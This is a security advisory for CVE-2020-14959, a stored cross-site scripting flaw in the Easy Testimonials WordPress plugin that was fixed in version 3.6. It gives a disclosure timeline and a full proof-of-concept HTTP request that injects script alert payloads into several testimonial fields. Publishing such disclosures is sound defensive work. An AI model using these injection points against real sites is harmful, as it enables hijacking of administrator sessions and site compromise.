Easy Testimonials < 3.6 – Authenticated Stored Cross-Site Scripting (XSS) | CVE 2020-14959

Description

Multiple cross-site scripting vulnerabilities in Easy Testimonials 3.5.2 and lower allow remote attackers to inject arbitrary web script or HTML via the Client Name, Position / Web Address / Other, Location Reviewed / Product Reviewed / Item Reviewed, Rating parameter.

Successful exploitation of this vulnerability would allow an authenticated medium-privileged user (contributor+) to inject arbitrary javascript code which is executed when admin and other users access the All Testimonials page in the backend. Furthermore, if the 'Allow HTML Tags in Testimonials' option is enabled (which is the default), the XSS will also be triggered when the testimonial is displayed in the frontend.

Timeline (WPScanTeam)
May 9th, 2020 - Confirmed & Escalated to WP Plugins Team
May 11th, 2020 - WP Plugins Team Investigating
May 12th, 2020 - v3.6 released, fixing the issue

Proof of Concept

POST /wp-admin/post.php?post=176&action=edit&meta-box-loader=1&meta-box-loader-nonce=ee114d2173&_locale=user HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: application/json, */*;q=0.1
Accept-Language: en-US,vi-VN;q=0.8,vi;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/post.php?post=176&action=edit
X-WP-Nonce: c12330b50c
Content-Type: multipart/form-data; boundary=---------------------------1097171016543246544154165286
Origin: http://example.com
Content-Length: 2729
DNT: 1
Connection: close
Cookie: wordpress_58dc4566418ddfdf24cf6b5640426bf6=author%7C1590119950%7CtpD9AZlWj2uRqbtzvtTcMWUew7TWWTqfj418mh5o1tr%7Ce020133190b2d0d55659fc79576f7341774c77f301b6096023e70f294549d103; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_58dc4566418ddfdf24cf6b5640426bf6=author%7C1590119950%7CtpD9AZlWj2uRqbtzvtTcMWUew7TWWTqfj418mh5o1tr%7C8642c6873c0009beb211174d3e93ed720f7d9826d71438fc48ac16ea7e999a66; wp-settings-3=libraryContent%3Dbrowse%26urlbutton%3Dnone%26posts_list_mode%3Dexcerpt; wp-settings-time-3=1588910767

-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wpnonce"

c627da8fa4
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/wp-admin/post.php?post=176&action=edit
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="user_ID"

3
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="action"

editpost
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="originalaction"

editpost
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="post_type"

testimonial
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="original_post_status"

publish
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="referredby"

http://example.com/testimonial/alerttitle/
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_wp_original_http_referer"

http://example.com/testimonial/alerttitle/
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="post_ID"

176
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="meta-box-order-nonce"

e78bbacfea
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="closedpostboxesnonce"

cb99c6138d
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="samplepermalinknonce"

97e0ac6960
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="my-custom-fields_wpnonce"

f842632466
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_client"

<script>alert('Client name')</script>
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_email"

test@gmail.com
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_position"

<script>alert('Position / Web Address / Other')</script>
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_other"

<script>alert('Location Reviewed / Product Reviewed / Item Reviewed')</script>
-----------------------------1097171016543246544154165286
Content-Disposition: form-data; name="_ikcf_rating"


-----------------------------1097171016543246544154165286--


#XSS TRIGGER POINT:
When an admin or authenticate user load contents of all testimonials.